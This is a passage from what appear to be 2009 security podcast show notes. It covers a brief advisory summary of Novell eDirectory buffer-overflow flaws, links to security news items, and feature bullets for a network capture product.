6. Novell eDirectory Multiple Vulnerabilities – Novell eDirectory is prone to multiple buffer-overflow and denial-of-service vulnerabilities. Successful exploits may allow attackers to execute arbitrary code within the context of the affected application or cause denial-of-service conditions. These issues affect eDirectory 8.8 SP3 and 8.8 SP3 FTF3.

News Items of Interest:

Item 1: (http://www.pcworld.com/article/182180/top_5_social_engineering_exploit_techniques.html?tk=rss_news)

Item 2:(http://jeremiahgrossman.blogspot.com/2009/11/owasp-top-10-2010-release-candidate-1.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+JeremiahGrossman+%28Jeremiah+Grossman%29)

Download URL http://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf

News item 3: (http://www.phiprivacy.net/?p=1294)

News item 5: (http://www.securegoose.org/2009/11/tls-renegotiation-vulnerability-cve.html)

News item 6: (http://www.v3.co.uk/v3/news/2253269/mcafee-warns-cyber-warfare)

If you are interested in a Nepenthes VM then you can find one here: http://www.sparsa.org/drupal/?q=node/11

News item 8: ( http://www.theregister.co.uk/2009/11/17/bank_of_america_skimming_plea/)

Tech Segment:

• Support for 802.11 Wireless Capture – initially supported under the portable NextGen Eagle platform, this capability will be available on all NextGen 9.0 capture platforms. This new capability supports WEP in-line decryption, and will support WPA decryption under an upcoming service pack.
• 10 Gbps Network Support – building off of real-world experiences with massive government, commercial and service provider networks, unlike other products in this space, NextGen 9.0 includes support for both capture and real-time analysis on 10 Gbps networks.
• Expanded authentication options – NextGen 9.0 supports Linux PAM, providing pluggable authentication modules that connect the NextGen infrastructure to customer authentication frameworks such as Kerberos for Windows and Unix environments, LDAP, Radius and many others.
• Expanded enterprise management – NextGen 9.0 introduces a new administrative dashboard that enables comprehensive insight into global health across all connected appliances. This includes real-time feedback and charting for all system metrics, and expanded interfaces for managing configuration parameters, rules, alerts, parsers, feeds, and software updates across all devices from a single location.
• Scriptable API – expanded support within the Software Development Kit (SDK) for C, C#, Java, Python, Perl, Ruby and .Net allowing programmers to extend the NextGen infrastructure using almost any popular language.

In an upcoming Episode we will have forensics expert Scott Moulton, and Pieter Swanpoel who will provide us with a glimpse into Mainframe Security.